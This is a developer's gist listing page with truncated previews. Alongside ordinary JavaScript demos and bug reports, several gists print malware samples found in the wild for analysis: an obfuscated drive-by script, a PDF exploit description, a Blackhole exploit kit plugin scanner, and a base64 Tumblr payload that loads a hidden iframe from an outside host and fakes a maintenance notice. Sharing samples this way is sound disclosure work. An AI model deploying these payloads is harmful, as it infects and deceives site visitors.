Scott Schiller scottschiller
scottschiller
/ normalized-addremove.html
Created
September 26, 2010 18:55
Somewhat-normalized event listener handling (DOM2)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>Somewhat-normalized event add/remove</title> | |
| <script> | |
| var addEvent, removeEvent; | |
| (function() { | |
| /* | |
| * Somewhat-normalized event add/remove (old IE/W3C) |
scottschiller
/ js-ball-collision.html
Created
July 10, 2011 03:07
A collision-enabled variant of my JavaScript Animation Demo #2, feature added at the request of a public school technology teacher who wrote in. (Teachers showing kids JavaScript in high school FTW! :P)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" | |
| "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> | |
| <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> | |
| <head> | |
| <style type="text/css"> | |
| body { | |
| font:76% normal verdana,arial,tahoma; | |
| } |
scottschiller
/ gist:1187837
Created
September 2, 2011 03:02
Closure compiler "INTERNAL COMPILER ERROR" with soundmanager2-nodebug.js (Compiler version 1346)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ Report for Google Closure Compiler folks, internal compiler error on routinely-compressed JS ] | |
| Source file used: | |
| https://raw.github.com/scottschiller/SoundManager2/V2.97a.20110801+DEV/script/soundmanager2-nodebug.js | |
| Reporting this per instructions in the compiler output. | |
| For what it's worth, compilation has previously been successful until I updated the compiler to the build below. | |
| This version of the compiler fails: | |
| Closure Compiler (http://code.google.com/closure/compiler) |
scottschiller
/ malware.html
Created
February 28, 2012 16:30
Browser malware found in the wild, 02/28/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. --> | |
| <!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. --> | |
| <!-- commented out to prevent accidental execution, too. --> | |
| <html><body><script> | |
| /* | |
| ss='s';g='g';r='r';d='d';c='c';t='t'; | |
| try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;} | |
| aaa=1+[]; | |
| try{new btoa({});}catch(qqq){ |
scottschiller
/ gist:2142215
Created
March 20, 2012 22:59
JavaScript PDF exploit found in the wild, 03/20/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I got this PDF as an email attachment. | |
| The PDF file included a JavaScript block defining an array, and some encoded (for example, {) character entries underneath defining the function responsible for decoding and running it. | |
| The interesting part of the PDF where the script started: | |
| <test:script contentType='application/x-javascript'> | |
| That was followed by the array data (not encoded), and then this block: |
scottschiller
/ gist:2623390
Created
May 6, 2012 17:25
— forked from spadgos/gist:2561726
Recreating a SoundManager bug / fixed testcase
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| report URL: https://getsatisfaction.com/schillmania/topics/sound_playing_double | |
| related SM2 fix/commit: https://github.com/scottschiller/SoundManager2/commit/013565dbb5abfc5bf0ab66b0246352ee3ca5cc02 | |
| --> | |
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> | |
| <title>Soundmanager test</title> | |
| <!-- you'll have to correct the paths to SoundManager to get it working for yourself --> | |
| <script>window.SM2_DEFER = true;</script> |
scottschiller
/ yui3-loader-test.html
Created
May 8, 2012 02:21
YUI 3.5.1 loader test (IE 9, quirks mode DTD)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| Lack of DTD means quirks mode in IE 9, and YUI 3.5.1 will fail to load module dependencies due to <script>.onload not being supported. <script>.onreadystatechange should instead be used when document.documentMode < 9, which means IE 9 rendering a page in quirks mode, IE 7 or IE 8 standards mode. | |
| --> | |
| <html> | |
| <head> | |
| <script src="http://yui.yahooapis.com/3.5.1/build/yui/yui-min.js"></script> | |
| <script> | |
| // Create a YUI sandbox on your page. | |
| YUI().use('node', 'event', function (Y) { | |
| // The Node and Event modules are loaded and ready to use. |
scottschiller
/ gist:2890589
Created
June 7, 2012 18:22
Loading messages on http://flickr.com/photos/upload/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Flickr is made of, by and for humans: Here are 17 signs of empathy in the form of loading messages. ;) --> | |
| Reticulating splines... | |
| Frobulating widgets... | |
| Engaging Tuna Blaster... | |
| Firing up the engines... | |
| Buffering... | |
| Herding pandas... | |
| Questioning the Magic Donkey... | |
| Your machine is learning our ways |
scottschiller
/ malware.js
Created
November 15, 2012 15:53
"Blackhole" Flash + Adobe PDF Reader + Java/getJavaInfo.jar web exploit found in the wild, 11/15/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Looks as though this thing scans for vulnerable versions of Flash, Adobe PDF Reader and Java plugins. | |
| * Oddly, the functions j1/j2/p1/p2/f1/f2 (which would presumably do the dirty work) are empty. | |
| * It's worth noting that the hosting (bad) page says "Please wait, you will be forwarded / IE and Firefox-compatible only". | |
| * Allegedly this is part of the "Blackhole Exploit Kit". | |
| * Related details / video etc.: | |
| * http://malwaremustdie.blogspot.com/2012/09/important-blackhole-exploit-kit-starts.html | |
| * http://malware.dontneedcoffee.com/2012/09/BHEK2.0landing.html | |
| */ |
scottschiller
/ gist:4196142
Created
December 3, 2012 16:36
Possible Tumblr exploit found in the wild, 12/03/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div class="the-video hideflash"><script src="data:text/plain;base64,dmFyIGZyYW1la2lsbGVyID0gdHJ1ZTsNCg0Kd2luZG93Lm9ubG9hZCA9IGZ1bmN0aW9uKCl7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsYXBwZXInKS5zcmMgPSAiaHR0cDovL2kuaG9wZS55b3UuZ2V0LnN0cmFuZ2xlZC5uZXQiOw0KfQ0KDQp3aW5kb3cub25iZWZvcmV1bmxvYWQgPSBmdW5jdGlvbigpIHsgDQogIGlmKGZyYW1la2lsbGVyKSB7DQogICAgcmV0dXJuICJOb3RpY2U6IFR1bWJsciB3aWxsIGJlIHVuZGVyZ29pbmcgbWFpbnRlbmFuY2Ugb24gRGVjZW1iZXIgNHRoIDIwMTIgYXQgMDE6MDAgQU0gZm9yIHNldmVyYWwgaG91cnMuXG5cbiBXZSBjYW5ub3QgZm9yZWNhc3QgZm9yIGV4YWN0bHkgaG93IGxvbmcsIHVuZm9ydHVuYXRlbHkuXG4gV2UgYXBvbG9naXplIGZvciB0aGUgaW5jb252ZW5pZW5jZS5cblxuWW91IG1heSBub3cgZGlzbWlzcyB0aGlzIG1lc3NhZ2UgdmlhICdDYW5jZWwvU3RheSBvbiB0aGlzIHBhZ2UnLiBUaGFuayB5b3UuIjsgIC8vIGFueSBtZXNzYWdlIHRoYXQgaGVscHMgdXNlciB0byBtYWtlIGRlY2lzaW9uDQogIH0NCn07"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div> | |
| Decoded: | |
| /* | |
| var framekiller = true; | |
| window.onload = function(){ | |
| document.getElementById('lapper').src = "http://i.hope.you.get.st |